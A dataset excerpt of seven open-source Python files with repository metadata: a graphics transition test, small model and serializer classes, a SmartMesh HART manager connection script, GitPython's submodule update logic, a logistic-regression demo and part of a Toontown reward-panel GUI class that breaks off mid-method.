text stringlengths 4 1.02M | meta dict |
|---|---|
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 0.5, s, t 1, s, t 1.5, s, t 2.1, s, q"
tags = "TurnOffTilesTransition"
import summa
from summa.director import director
from summa.actions import *
from summa.layer import *
from summa.scenes import *
from summa.sprite import *
import pyglet
from pyglet import gl
class BackgroundLayer(summa.layer.Layer):
def __init__(self):
super(BackgroundLayer, self).__init__()
self.img = pyglet.resource.image('background_image.png')
def draw( self ):
glColor4ub(255, 255, 255, 255)
glPushMatrix()
self.transform()
self.img.blit(0,0)
glPopMatrix()
def main():
director.init( resizable=True )
scene1 = summa.scene.Scene()
scene2 = summa.scene.Scene()
colorl = ColorLayer(32,32,255,255)
sprite = Sprite( 'grossini.png', (320,240) )
colorl.add( sprite )
scene1.add( BackgroundLayer(), z=0 )
scene2.add( colorl, z=0 )
director.run( TurnOffTilesTransition( scene1, 2, scene2) )
if __name__ == '__main__':
main()
| {
"content_hash": "f9a829fc1fde1dddb740c3ae25ac1792",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 65,
"avg_line_length": 24.77777777777778,
"alnum_prop": 0.6385650224215247,
"repo_name": "shackra/thomas-aquinas",
"id": "7c192775f130ac34802c91017d9f87c91496e4da",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/stable-branch",
"path": "tests/test_transition_turnofftiles.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1245155"
}
],
"symlink_target": ""
} |
from enum import Enum
class FollowType(Enum):
ORG = 1
USER = 2
class Follow(object):
followType = None
id = ""
name = ""
href = ""
def __init__(self,followType,id,name,href):
assert type(followType) == type(FollowType.ORG)
self.followType = followType
self.id = id
self.name = name
self.href = href
def __str__(self):
return "{name:%s,id:%s,href:%s,type:%s}" % (self.name, self.id, self.href, str(self.followType))
def __repr__(self):
return "{name:%s,id:%s,href:%s,type:%s}" % (self.name, self.id, self.href, str(self.followType))
| {
"content_hash": "c87b8159cfadb9707b55c66af334dede",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 104,
"avg_line_length": 25.2,
"alnum_prop": 0.5682539682539682,
"repo_name": "XJouYi/SinaWeibo",
"id": "e91e40108fe8e8a52c76003d223e35c6aa6f10b1",
"size": "672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SinaWeibo/follow.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16396"
}
],
"symlink_target": ""
} |
from rest_framework import serializers
from placements.models import Bed, Plant, Inventory_Placement, Row
class BedSerializer(serializers.ModelSerializer):
class Meta:
model = Bed
fields = ('id', 'name')
class RowSerializer(serializers.ModelSerializer):
class Meta:
model = Row
fields = ('id', 'name', 'bed', 'comments')
class PlantSerializer(serializers.ModelSerializer):
class Meta:
model = Plant
fields = ('id', 'name', 'hybridizer', 'pod', 'pollen', 'bloom_size_inches',
'scape_height_inches', 'ploidy', 'foilage_type', 'bloom_habit',
'bud_count', 'branches', 'fragrant', 'description', 'comments')
class Inventory_PlacementSerializer(serializers.ModelSerializer):
plant = PlantSerializer()
bed = BedSerializer()
class Meta:
model = Inventory_Placement
fields = ('id', 'plant', 'bed', 'row', 'space', 'comments')
class PlacementManipulateSerializer(serializers.ModelSerializer):
class Meta:
model = Inventory_Placement
fields = ('id', 'plant', 'bed', 'row', 'space', 'comments')
| {
"content_hash": "5a68391d331be18f91b4cd079c85d09d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 83,
"avg_line_length": 30.675675675675677,
"alnum_prop": 0.6405286343612335,
"repo_name": "pgenho/PPPRO",
"id": "70d1ad80edb1e08ca028183ed1bade25b71a67c0",
"size": "1136",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/serializers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "91080"
},
{
"name": "HTML",
"bytes": "40874"
},
{
"name": "JavaScript",
"bytes": "160492"
},
{
"name": "Python",
"bytes": "20269"
}
],
"symlink_target": ""
} |
#============================ adjust path =====================================
import sys
import os
if __name__ == "__main__":
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..', '..'))
#============================ imports =========================================
from SmartMeshSDK.HartMgrConnector import HartMgrConnector
from SmartMeshSDK.ApiDefinition import ApiDefinition, \
HartMgrDefinition
from SmartMeshSDK.ApiException import CommandError, \
ConnectionError
#============================ main ============================================
print 'Simple Application which interacts with the HART manager - (c) Dust Networks'
print '\n\n================== Step 1. Connecting to the manager =============='
connect = raw_input('\nDo you want to connect to a manager XML API? [y/n] ')
if connect.strip()!='y':
raw_input('\nScript ended. Press Enter to exit.')
sys.exit()
print '\n=====\nCreating connector'
connector = HartMgrConnector.HartMgrConnector()
print 'done.'
hartHost = raw_input('\nEnter the Manager\'s ip address (Factory default is 192.168.99.100) ')
#hartHost = raw_input('\nEnter the Manager\'s ip address (leave blank for '+DEFAULT_HOST+') ')
if not hartHost:
hartHost = DEFAULT_HOST
hartPort = raw_input('\nEnter the Manager\'s port (It is normally 4445) ')
#hartPort = raw_input('\nEnter the Manager\'s port (leave blank for '+str(DEFAULT_PORT)+') ')
if hartPort:
hartPort = int(hartPort)
else:
hartPort = DEFAULT_PORT
print '\n=====\nConnecting to Hart manager'
try:
connector.connect({
'host': hartHost,
'port': hartPort,
'user': 'admin',
'password': 'admin',
'use_ssl': False,
})
except ConnectionError as err:
print err
raw_input('\nScript ended. Press Enter to exit.')
sys.exit(1)
print 'done.'
keepgoing = raw_input('\nDo you want to keep going? [y/n] ')
if keepgoing.strip()!='y':
raw_input('\nScript ended. Press Enter to exit.')
sys.exit()
###########
raw_input('\nScript ended. Press Enter to exit.')
| {
"content_hash": "30f980d628d47e9658db125c5dc6cbe0",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 94,
"avg_line_length": 33.125,
"alnum_prop": 0.5106918238993711,
"repo_name": "bubbalinear/smartmeshsdk",
"id": "5008c935d35a87f119763939b8b846c638b55222",
"size": "2404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bin/Simple/SimpleHartMgr.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1918602"
}
],
"symlink_target": ""
} |
from .base import (
Submodule,
UpdateProgress
)
from .util import (
find_first_remote_branch
)
from git.exc import InvalidGitRepositoryError
import git
import logging
__all__ = ["RootModule", "RootUpdateProgress"]
log = logging.getLogger('git.objects.submodule.root')
log.addHandler(logging.NullHandler())
class RootUpdateProgress(UpdateProgress):
"""Utility class which adds more opcodes to the UpdateProgress"""
REMOVE, PATHCHANGE, BRANCHCHANGE, URLCHANGE = [
1 << x for x in range(UpdateProgress._num_op_codes, UpdateProgress._num_op_codes + 4)]
_num_op_codes = UpdateProgress._num_op_codes + 4
__slots__ = tuple()
BEGIN = RootUpdateProgress.BEGIN
END = RootUpdateProgress.END
REMOVE = RootUpdateProgress.REMOVE
BRANCHCHANGE = RootUpdateProgress.BRANCHCHANGE
URLCHANGE = RootUpdateProgress.URLCHANGE
PATHCHANGE = RootUpdateProgress.PATHCHANGE
class RootModule(Submodule):
"""A (virtual) Root of all submodules in the given repository. It can be used
to more easily traverse all submodules of the master repository"""
__slots__ = tuple()
k_root_name = '__ROOT__'
def __init__(self, repo):
# repo, binsha, mode=None, path=None, name = None, parent_commit=None, url=None, ref=None)
super(RootModule, self).__init__(
repo,
binsha=self.NULL_BIN_SHA,
mode=self.k_default_mode,
path='',
name=self.k_root_name,
parent_commit=repo.head.commit,
url='',
branch_path=git.Head.to_full_path(self.k_head_default)
)
def _clear_cache(self):
"""May not do anything"""
pass
#{ Interface
def update(self, previous_commit=None, recursive=True, force_remove=False, init=True,
to_latest_revision=False, progress=None, dry_run=False, force_reset=False,
keep_going=False):
"""Update the submodules of this repository to the current HEAD commit.
This method behaves smartly by determining changes of the path of a submodules
repository, next to changes to the to-be-checked-out commit or the branch to be
checked out. This works if the submodules ID does not change.
Additionally it will detect addition and removal of submodules, which will be handled
gracefully.
:param previous_commit: If set to a commit'ish, the commit we should use
as the previous commit the HEAD pointed to before it was set to the commit it points to now.
If None, it defaults to HEAD@{1} otherwise
:param recursive: if True, the children of submodules will be updated as well
using the same technique
:param force_remove: If submodules have been deleted, they will be forcibly removed.
Otherwise the update may fail if a submodule's repository cannot be deleted as
changes have been made to it (see Submodule.update() for more information)
:param init: If we encounter a new module which would need to be initialized, then do it.
:param to_latest_revision: If True, instead of checking out the revision pointed to
by this submodule's sha, the checked out tracking branch will be merged with the
latest remote branch fetched from the repository's origin.
Unless force_reset is specified, a local tracking branch will never be reset into its past, therefore
the remote branch must be in the future for this to have an effect.
:param force_reset: if True, submodules may checkout or reset their branch even if the repository has
pending changes that would be overwritten, or if the local tracking branch is in the future of the
remote tracking branch and would be reset into its past.
:param progress: RootUpdateProgress instance or None if no progress should be sent
:param dry_run: if True, operations will not actually be performed. Progress messages
will change accordingly to indicate the WOULD DO state of the operation.
:param keep_going: if True, we will ignore but log all errors, and keep going recursively.
Unless dry_run is set as well, keep_going could cause subsequent/inherited errors you wouldn't see
otherwise.
In conjunction with dry_run, it can be useful to anticipate all errors when updating submodules
:return: self"""
if self.repo.bare:
raise InvalidGitRepositoryError("Cannot update submodules in bare repositories")
# END handle bare
if progress is None:
progress = RootUpdateProgress()
# END assure progress is set
prefix = ''
if dry_run:
prefix = 'DRY-RUN: '
repo = self.repo
try:
# SETUP BASE COMMIT
###################
cur_commit = repo.head.commit
if previous_commit is None:
try:
previous_commit = repo.commit(repo.head.log_entry(-1).oldhexsha)
if previous_commit.binsha == previous_commit.NULL_BIN_SHA:
raise IndexError
# END handle initial commit
except IndexError:
# in new repositories, there is no previous commit
previous_commit = cur_commit
# END exception handling
else:
previous_commit = repo.commit(previous_commit) # obtain commit object
# END handle previous commit
psms = self.list_items(repo, parent_commit=previous_commit)
sms = self.list_items(repo)
spsms = set(psms)
ssms = set(sms)
# HANDLE REMOVALS
###################
rrsm = (spsms - ssms)
len_rrsm = len(rrsm)
for i, rsm in enumerate(rrsm):
op = REMOVE
if i == 0:
op |= BEGIN
# END handle begin
# fake it into thinking its at the current commit to allow deletion
# of previous module. Trigger the cache to be updated before that
progress.update(op, i, len_rrsm, prefix + "Removing submodule %r at %s" % (rsm.name, rsm.abspath))
rsm._parent_commit = repo.head.commit
rsm.remove(configuration=False, module=True, force=force_remove, dry_run=dry_run)
if i == len_rrsm - 1:
op |= END
# END handle end
progress.update(op, i, len_rrsm, prefix + "Done removing submodule %r" % rsm.name)
# END for each removed submodule
# HANDLE PATH RENAMES
#####################
# url changes + branch changes
csms = (spsms & ssms)
len_csms = len(csms)
for i, csm in enumerate(csms):
psm = psms[csm.name]
sm = sms[csm.name]
# PATH CHANGES
##############
if sm.path != psm.path and psm.module_exists():
progress.update(BEGIN | PATHCHANGE, i, len_csms, prefix +
"Moving repository of submodule %r from %s to %s"
% (sm.name, psm.abspath, sm.abspath))
# move the module to the new path
if not dry_run:
psm.move(sm.path, module=True, configuration=False)
# END handle dry_run
progress.update(
END | PATHCHANGE, i, len_csms, prefix + "Done moving repository of submodule %r" % sm.name)
# END handle path changes
if sm.module_exists():
# HANDLE URL CHANGE
###################
if sm.url != psm.url:
# Add the new remote, remove the old one
# This way, if the url just changes, the commits will not
# have to be re-retrieved
nn = '__new_origin__'
smm = sm.module()
rmts = smm.remotes
# don't do anything if we already have the url we search in place
if len([r for r in rmts if r.url == sm.url]) == 0:
progress.update(BEGIN | URLCHANGE, i, len_csms, prefix +
"Changing url of submodule %r from %s to %s" % (sm.name, psm.url, sm.url))
if not dry_run:
assert nn not in [r.name for r in rmts]
smr = smm.create_remote(nn, sm.url)
smr.fetch(progress=progress)
# If we have a tracking branch, it should be available
# in the new remote as well.
if len([r for r in smr.refs if r.remote_head == sm.branch_name]) == 0:
raise ValueError(
"Submodule branch named %r was not available in new submodule remote at %r"
% (sm.branch_name, sm.url)
)
# END head is not detached
# now delete the changed one
rmt_for_deletion = None
for remote in rmts:
if remote.url == psm.url:
rmt_for_deletion = remote
break
# END if urls match
# END for each remote
# if we didn't find a matching remote, but have exactly one,
# we can safely use this one
if rmt_for_deletion is None:
if len(rmts) == 1:
rmt_for_deletion = rmts[0]
else:
# if we have not found any remote with the original url
# we may not have a name. This is a special case,
# and its okay to fail here
# Alternatively we could just generate a unique name and leave all
# existing ones in place
raise InvalidGitRepositoryError(
"Couldn't find original remote-repo at url %r" % psm.url)
# END handle one single remote
# END handle check we found a remote
orig_name = rmt_for_deletion.name
smm.delete_remote(rmt_for_deletion)
# NOTE: Currently we leave tags from the deleted remotes
# as well as separate tracking branches in the possibly totally
# changed repository ( someone could have changed the url to
# another project ). At some point, one might want to clean
# it up, but the danger is high to remove stuff the user
# has added explicitly
# rename the new remote back to what it was
smr.rename(orig_name)
# early on, we verified that the our current tracking branch
# exists in the remote. Now we have to assure that the
# sha we point to is still contained in the new remote
# tracking branch.
smsha = sm.binsha
found = False
rref = smr.refs[self.branch_name]
for c in rref.commit.traverse():
if c.binsha == smsha:
found = True
break
# END traverse all commits in search for sha
# END for each commit
if not found:
# adjust our internal binsha to use the one of the remote
# this way, it will be checked out in the next step
# This will change the submodule relative to us, so
# the user will be able to commit the change easily
log.warn("Current sha %s was not contained in the tracking\
branch at the new remote, setting it the the remote's tracking branch", sm.hexsha)
sm.binsha = rref.commit.binsha
# END reset binsha
# NOTE: All checkout is performed by the base implementation of update
# END handle dry_run
progress.update(
END | URLCHANGE, i, len_csms, prefix + "Done adjusting url of submodule %r" % (sm.name))
# END skip remote handling if new url already exists in module
# END handle url
# HANDLE PATH CHANGES
#####################
if sm.branch_path != psm.branch_path:
# finally, create a new tracking branch which tracks the
# new remote branch
progress.update(BEGIN | BRANCHCHANGE, i, len_csms, prefix +
"Changing branch of submodule %r from %s to %s"
% (sm.name, psm.branch_path, sm.branch_path))
if not dry_run:
smm = sm.module()
smmr = smm.remotes
# As the branch might not exist yet, we will have to fetch all remotes to be sure ... .
for remote in smmr:
remote.fetch(progress=progress)
# end for each remote
try:
tbr = git.Head.create(smm, sm.branch_name, logmsg='branch: Created from HEAD')
except OSError:
# ... or reuse the existing one
tbr = git.Head(smm, sm.branch_path)
# END assure tracking branch exists
tbr.set_tracking_branch(find_first_remote_branch(smmr, sm.branch_name))
# NOTE: All head-resetting is done in the base implementation of update
# but we will have to checkout the new branch here. As it still points to the currently
# checkout out commit, we don't do any harm.
# As we don't want to update working-tree or index, changing the ref is all there is to do
smm.head.reference = tbr
# END handle dry_run
progress.update(
END | BRANCHCHANGE, i, len_csms, prefix + "Done changing branch of submodule %r" % sm.name)
# END handle branch
# END handle
# END for each common submodule
except Exception as err:
if not keep_going:
raise
log.error(str(err))
# end handle keep_going
# FINALLY UPDATE ALL ACTUAL SUBMODULES
######################################
for sm in sms:
# update the submodule using the default method
sm.update(recursive=False, init=init, to_latest_revision=to_latest_revision,
progress=progress, dry_run=dry_run, force=force_reset, keep_going=keep_going)
# update recursively depth first - question is which inconsitent
# state will be better in case it fails somewhere. Defective branch
# or defective depth. The RootSubmodule type will never process itself,
# which was done in the previous expression
if recursive:
# the module would exist by now if we are not in dry_run mode
if sm.module_exists():
type(self)(sm.module()).update(recursive=True, force_remove=force_remove,
init=init, to_latest_revision=to_latest_revision,
progress=progress, dry_run=dry_run, force_reset=force_reset,
keep_going=keep_going)
# END handle dry_run
# END handle recursive
# END for each submodule to update
return self
def module(self):
""":return: the actual repository containing the submodules"""
return self.repo
#} END interface
#} END classes
| {
"content_hash": "f135646ae83a8b90b362ad5dc07dfc54",
"timestamp": "",
"source": "github",
"line_count": 350,
"max_line_length": 120,
"avg_line_length": 50.47428571428571,
"alnum_prop": 0.5012453300124533,
"repo_name": "jeblair/GitPython",
"id": "fbd658d7c055f6857743cb98f990b138fdbf4334",
"size": "17666",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "git/objects/submodule/root.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "587"
},
{
"name": "Python",
"bytes": "801803"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
} |
"""
Implementing logistic regression for classification problem
Helpful resources:
Coursera ML course
https://medium.com/@martinpella/logistic-regression-from-scratch-in-python-124c5636b8ac
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn import datasets
# get_ipython().run_line_magic('matplotlib', 'inline')
# In[67]:
# sigmoid function or logistic function is used as a hypothesis function in
# classification problems
def sigmoid_function(z):
return 1 / (1 + np.exp(-z))
def cost_function(h, y):
return (-y * np.log(h) - (1 - y) * np.log(1 - h)).mean()
def log_likelihood(X, Y, weights):
scores = np.dot(X, weights)
return np.sum(Y * scores - np.log(1 + np.exp(scores)))
# here alpha is the learning rate, X is the feature matrix,y is the target matrix
def logistic_reg(alpha, X, y, max_iterations=70000):
theta = np.zeros(X.shape[1])
for iterations in range(max_iterations):
z = np.dot(X, theta)
h = sigmoid_function(z)
gradient = np.dot(X.T, h - y) / y.size
theta = theta - alpha * gradient # updating the weights
z = np.dot(X, theta)
h = sigmoid_function(z)
J = cost_function(h, y)
if iterations % 100 == 0:
print(f"loss: {J} \t") # printing the loss after every 100 iterations
return theta
# In[68]:
if __name__ == "__main__":
iris = datasets.load_iris()
X = iris.data[:, :2]
y = (iris.target != 0) * 1
alpha = 0.1
theta = logistic_reg(alpha, X, y, max_iterations=70000)
print("theta: ", theta) # printing the theta i.e our weights vector
def predict_prob(X):
return sigmoid_function(
np.dot(X, theta)
) # predicting the value of probability from the logistic regression algorithm
plt.figure(figsize=(10, 6))
plt.scatter(X[y == 0][:, 0], X[y == 0][:, 1], color="b", label="0")
plt.scatter(X[y == 1][:, 0], X[y == 1][:, 1], color="r", label="1")
(x1_min, x1_max) = (X[:, 0].min(), X[:, 0].max())
(x2_min, x2_max) = (X[:, 1].min(), X[:, 1].max())
(xx1, xx2) = np.meshgrid(np.linspace(x1_min, x1_max), np.linspace(x2_min, x2_max))
grid = np.c_[xx1.ravel(), xx2.ravel()]
probs = predict_prob(grid).reshape(xx1.shape)
plt.contour(xx1, xx2, probs, [0.5], linewidths=1, colors="black")
plt.legend()
plt.show()
| {
"content_hash": "9084bba43106ef90bb3982a17d07c306",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 87,
"avg_line_length": 30.68831168831169,
"alnum_prop": 0.6089716462124418,
"repo_name": "wuweilin/python",
"id": "48d88ef61185af0fe894bca3828ece4c06731a07",
"size": "2480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "machine_learning/logistic_regression.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import copy
from direct.directnotify import DirectNotifyGlobal
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
import math
from pandac.PandaModules import *
import random
import Fanfare
from otp.otpbase import OTPGlobals
from toontown.coghq import CogDisguiseGlobals
from toontown.quest import Quests
from toontown.shtiker import DisguisePage
from toontown.suit import SuitDNA
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownBattleGlobals
from toontown.toonbase import ToontownGlobals
class RewardPanel(DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('RewardPanel')
SkipBattleMovieEvent = 'skip-battle-movie-event'
def __init__(self, name):
gscale = (TTLocalizer.RPdirectFrame[0], TTLocalizer.RPdirectFrame[1], TTLocalizer.RPdirectFrame[2] * 1.1)
DirectFrame.__init__(self, relief=None, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_pos=Point3(0, 0, -.05), geom_scale=gscale, pos=(0, 0, 0.587))
self.initialiseoptions(RewardPanel)
self.avNameLabel = DirectLabel(parent=self, relief=None, pos=(0, 0, 0.3), text=name, text_scale=0.08)
self.gagExpFrame = DirectFrame(parent=self, relief=None, pos=(-0.32, 0, 0.24))
self.itemFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelItems, text_pos=(0, 0.2), text_scale=0.08)
self.cogPartFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelCogPart, text_pos=(0, 0.2), text_scale=0.08)
self.missedItemFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelMissedItems, text_pos=(0, 0.2), text_scale=0.08)
self.itemLabel = DirectLabel(parent=self.itemFrame, text='', text_scale=0.06)
self.cogPartLabel = DirectLabel(parent=self.cogPartFrame, text='', text_scale=0.06)
self.missedItemLabel = DirectLabel(parent=self.missedItemFrame, text='', text_scale=0.06)
self.questFrame = DirectFrame(parent=self, relief=None, text=TTLocalizer.RewardPanelToonTasks, text_pos=(0, 0.2), text_scale=0.06)
self.questLabelList = []
for i in xrange(ToontownGlobals.MaxQuestCarryLimit):
label = DirectLabel(parent=self.questFrame, relief=None, pos=(-0.85, 0, -0.1 * i), text=TTLocalizer.RewardPanelQuestLabel % i, text_scale=0.05, text_align=TextNode.ALeft)
label.hide()
self.questLabelList.append(label)
self.newGagFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.endTrackFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.congratsLeft = DirectLabel(parent=self.newGagFrame, pos=(-0.2, 0, -0.1), text='', text_pos=(0, 0), text_scale=0.06)
self.congratsLeft.setHpr(0, 0, -30)
self.congratsRight = DirectLabel(parent=self.newGagFrame, pos=(0.2, 0, -0.1), text='', text_pos=(0, 0), text_scale=0.06)
self.congratsRight.setHpr(0, 0, 30)
self.promotionFrame = DirectFrame(parent=self, relief=None, pos=(0, 0, 0.24), text='', text_wordwrap=14.4, text_pos=(0, -0.46), text_scale=0.06)
self.trackLabels = []
self.trackIncLabels = []
self.trackBars = []
self.trackBarsOffset = 0
self.meritLabels = []
self.meritIncLabels = []
self.meritBars = []
for i in xrange(len(SuitDNA.suitDepts)):
deptName = TextEncoder.upper(SuitDNA.suitDeptFullnames[SuitDNA.suitDepts[i]])
self.meritLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text=deptName, text_scale=0.05, text_align=TextNode.ARight, pos=(TTLocalizer.RPmeritLabelPosX, 0, -0.09 * i - 0.125), text_pos=(0, -0.02)))
self.meritIncLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text='', text_scale=0.05, text_align=TextNode.ALeft, pos=(0.7, 0, -0.09 * i - 0.125), text_pos=(0, -0.02)))
self.meritBars.append(DirectWaitBar(parent=self.gagExpFrame, relief=DGG.SUNKEN, frameSize=(-1,
1,
-0.15,
0.15), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(DisguisePage.DeptColors[i][0] * 0.7,
DisguisePage.DeptColors[i][1] * 0.7,
DisguisePage.DeptColors[i][2] * 0.7,
1), barColor=(DisguisePage.DeptColors[i][0],
DisguisePage.DeptColors[i][1],
DisguisePage.DeptColors[i][2],
1), text='0/0 ' + TTLocalizer.RewardPanelMeritBarLabels[i], text_scale=TTLocalizer.RPmeritBarLabels, text_fg=(0, 0, 0, 1), text_align=TextNode.ALeft, text_pos=(-0.96, -0.05), pos=(TTLocalizer.RPmeritBarsPosX, 0, -0.09 * i - 0.125)))
for i in xrange(len(ToontownBattleGlobals.Tracks)):
trackName = TextEncoder.upper(ToontownBattleGlobals.Tracks[i])
self.trackLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text=trackName, text_scale=TTLocalizer.RPtrackLabels, text_align=TextNode.ARight, pos=(0.13, 0, -0.09 * i), text_pos=(0, -0.02)))
self.trackIncLabels.append(DirectLabel(parent=self.gagExpFrame, relief=None, text='', text_scale=0.05, text_align=TextNode.ALeft, pos=(0.65, 0, -0.09 * i), text_pos=(0, -0.02)))
self.trackBars.append(DirectWaitBar(parent=self.gagExpFrame, relief=DGG.SUNKEN, frameSize=(-1,
1,
-0.15,
0.15), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(ToontownBattleGlobals.TrackColors[i][0] * 0.7,
ToontownBattleGlobals.TrackColors[i][1] * 0.7,
ToontownBattleGlobals.TrackColors[i][2] * 0.7,
1), barColor=(ToontownBattleGlobals.TrackColors[i][0],
ToontownBattleGlobals.TrackColors[i][1],
ToontownBattleGlobals.TrackColors[i][2],
1), text='0/0', text_scale=0.18, text_fg=(0, 0, 0, 1), text_align=TextNode.ACenter, text_pos=(0, -0.05), pos=(0.4, 0, -0.09 * i)))
self._battleGui = loader.loadModel('phase_3.5/models/gui/battle_gui')
self.skipButton = DirectButton(parent=self, relief=None, image=(self._battleGui.find('**/tt_t_gui_gen_skipSectionUp'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionDown'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionRollOver'),
self._battleGui.find('**/tt_t_gui_gen_skipSectionDisabled')), pos=(0.815, 0, -0.395), scale=(0.39, 1.0, 0.39), text=('',
TTLocalizer.RewardPanelSkip,
TTLocalizer.RewardPanelSkip,
''), text_scale=TTLocalizer.RPskipScale, text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=TTLocalizer.RPskipPos, textMayChange=0, command=self._handleSkip)
return
def getNextExpValue(self, curSkill, trackIndex):
retVal = ToontownBattleGlobals.UberSkill
for amount in ToontownBattleGlobals.Levels[trackIndex]:
if curSkill < amount:
retVal = amount
return retVal
return retVal
def getNextExpValueUber(self, curSkill, trackIndex):
return ToontownBattleGlobals.UberSkill
def getNextMeritValue(self, curMerits, toon, dept):
totalMerits = CogDisguiseGlobals.getTotalMerits(toon, dept)
retVal = totalMerits
if curMerits > totalMerits:
retVal = amount
return retVal
def initItemFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.show()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
def initMissedItemFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.show()
def initCogPartFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.show()
self.cogPartLabel['text'] = ''
self.missedItemFrame.hide()
def initQuestFrame(self, toon, avQuests):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.show()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
for i in xrange(ToontownGlobals.MaxQuestCarryLimit):
questLabel = self.questLabelList[i]
questLabel['text_fg'] = (0, 0, 0, 1)
questLabel.hide()
for i in xrange(len(avQuests)):
questDesc = avQuests[i]
questId, npcId, toNpcId, rewardId, toonProgress = questDesc
quest = Quests.getQuest(questId)
if quest:
questString = quest.getString()
progressString = quest.getProgressString(toon, questDesc)
rewardString = quest.getRewardString(progressString)
rewardString = Quests.fillInQuestNames(rewardString, toNpcId=toNpcId)
completed = quest.getCompletionStatus(toon, questDesc) == Quests.COMPLETE
questLabel = self.questLabelList[i]
questLabel.show()
if base.localAvatar.tutorialAck:
questLabel['text'] = rewardString
if completed:
questLabel['text_fg'] = (0, 0.3, 0, 1)
else:
questLabel['text'] = questString + ' :'
def initGagFrame(self, toon, expList, meritList, noSkip = False):
self.avNameLabel['text'] = toon.getName()
self.endTrackFrame.hide()
self.gagExpFrame.show()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
trackBarOffset = 0
self.skipButton['state'] = choice(noSkip, DGG.DISABLED, DGG.NORMAL)
for i in xrange(len(SuitDNA.suitDepts)):
meritBar = self.meritBars[i]
meritLabel = self.meritLabels[i]
totalMerits = CogDisguiseGlobals.getTotalMerits(toon, i)
merits = meritList[i]
self.meritIncLabels[i].hide()
promoStatus = toon.promotionStatus[i]
if CogDisguiseGlobals.isSuitComplete(toon.cogParts, i):
if not self.trackBarsOffset:
trackBarOffset = 0.47
self.trackBarsOffset = 1
meritBar.show()
meritLabel.show()
meritLabel.show()
if totalMerits:
meritBar['range'] = totalMerits
meritBar['value'] = merits
if promoStatus != ToontownGlobals.PendingPromotion:
meritBar['text'] = '%s/%s %s' % (merits, totalMerits, TTLocalizer.RewardPanelMeritBarLabels[i])
maxSuitType = SuitDNA.suitsPerDept - 1
maxSuitLevel = (SuitDNA.levelsPerSuit-1) + maxSuitType
if toon.cogLevels[i] == maxSuitLevel:
if promoStatus == ToontownGlobals.PendingPromotion:
meritBar['range'] = 1
meritBar['value'] = 1
meritBar['text'] = TTLocalizer.RewardPanelMeritsMaxed
elif promoStatus == ToontownGlobals.PendingPromotion:
meritBar['range'] = 1
meritBar['value'] = 1
meritBar['text'] = TTLocalizer.RewardPanelPromotionPending
self.resetMeritBarColor(i)
else:
meritBar.hide()
meritLabel.hide()
for i in xrange(len(expList)):
curExp = expList[i]
trackBar = self.trackBars[i]
trackLabel = self.trackLabels[i]
trackIncLabel = self.trackIncLabels[i]
trackBar.setX(trackBar.getX() - trackBarOffset)
trackLabel.setX(trackLabel.getX() - trackBarOffset)
trackIncLabel.setX(trackIncLabel.getX() - trackBarOffset)
trackIncLabel.hide()
if toon.hasTrackAccess(i):
trackBar.show()
if curExp >= ToontownBattleGlobals.UnpaidMaxSkills[i] and toon.getGameAccess() != OTPGlobals.AccessFull:
